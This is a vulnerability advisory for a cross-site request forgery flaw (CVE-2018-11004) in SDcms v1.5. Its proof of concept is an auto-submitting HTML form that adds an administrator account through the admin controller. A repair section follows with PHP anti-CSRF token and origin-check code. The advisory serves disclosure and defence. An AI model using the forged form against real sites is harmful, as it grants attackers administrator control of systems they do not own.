SDcms v1.5 CVE-2018-11004 – Cross-site request forgery

Author: TekerFue                 Risk: High

CVE: CVE-2018-11004              0day: Cross-site request forgery

0day-id: 0DAY-176170             Date: 2018-05-13

Description

An issue was discovered in SDcms v1.5. Cross-site request forgery (CSRF) vulnerability in /WWW//app/admin/controller/admincontroller.php allows remote attackers to add administrator accounts via m=admin&c=admin&a=add.

Analysis

Looking at line 19 of the admincontroller.php script (the add action), the script has no anti-CSRF mechanism: it accepts any POST that carries the administrator's session cookie, without checking a per-session token or the request's origin, so any site the administrator visits can submit the form on their behalf.

POC

A logged-in administrator opens the attacker's page: http://192.168.232.133/evil.html

Payload (the forged request targets the add action on the SDcms host):

http://127.0.0.1/?m=admin&c=admin&a=add

evil.html:
<html>
  <body>
    <p>this is a test</p>
    <!-- Auto-submitting form that forges the add-admin POST; the victim's
         browser attaches their SDcms session cookie to the cross-site request. -->
    <form action="http://127.0.0.1/?m=admin&c=admin&a=add" method="post">
      <input type="text" name="t0" value="test">
      <input type="text" name="t1" value="123456">
      <input type="text" name="t2" value="test">
      <input type="text" name="t3" value="0">
      <input type="text" name="t4" value="1">
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

Repair method

Add a random anti-CSRF token check: embed a per-session random token in every state-changing admin form and reject any POST to the add action whose token does not match the one stored in the session. As defence in depth, reject GET for state-changing actions, check the Origin/Referer header, and mark the session cookie SameSite.
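The following is an added example of such a check, not SDcms code: a minimal synchronizer-token guard in PHP. The field name `_csrf`, the session key, and the function names are assumptions; the real SDcms handler would have to call csrf_field() when rendering the add-admin form and csrf_verify() before creating the account.

```php
<?php
// Added example (not SDcms code): synchronizer-token CSRF guard for an admin
// "add" action. Field, session-key and function names are assumptions.

declare(strict_types=1);

const CSRF_FIELD = '_csrf';            // hidden form field name (assumed)
const CSRF_SESSION_KEY = '_csrf_token'; // session slot holding the token (assumed)

// Issue (or reuse) a per-session random token. Called when rendering the form.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

// Hidden input to embed in every state-changing admin form.
function csrf_field(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Verify the token on a request. Takes the arrays explicitly so it can be
// unit-tested without a live session. Constant-time compare via hash_equals
// so a mismatch does not leak the token byte by byte. Any missing or
// malformed value fails closed.
function csrf_verify(array $post, array $session, string $method): bool
{
    if ($method !== 'POST') {
        return false; // state-changing actions must not be reachable via GET
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given = $post[CSRF_FIELD] ?? '';
    if (!is_string($expected) || !is_string($given) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Defence in depth: the Origin (or, failing that, Referer) header must name
// our own host. A forged cross-site POST carries the attacker's origin.
function same_origin(array $server, string $expectedHost): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($origin, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Hypothetical use in the add-admin handler (SDcms's real handler differs):
if (PHP_SAPI !== 'cli') {
    session_start();
    if (!csrf_verify($_POST, $_SESSION, $_SERVER['REQUEST_METHOD'] ?? '')
        || !same_origin($_SERVER, $_SERVER['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    // ... only now create the administrator account from $_POST ...
}
```

With this in place the evil.html above fails: the attacker's page cannot read the victim's session token, so the forged form has no valid `_csrf` value and the handler returns 403 before touching the account table. Setting the session cookie with `SameSite=Lax` (session_set_cookie_params(['samesite' => 'Lax']), PHP 7.3 or later) additionally stops the browser from attaching the cookie to a cross-site POST at all.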
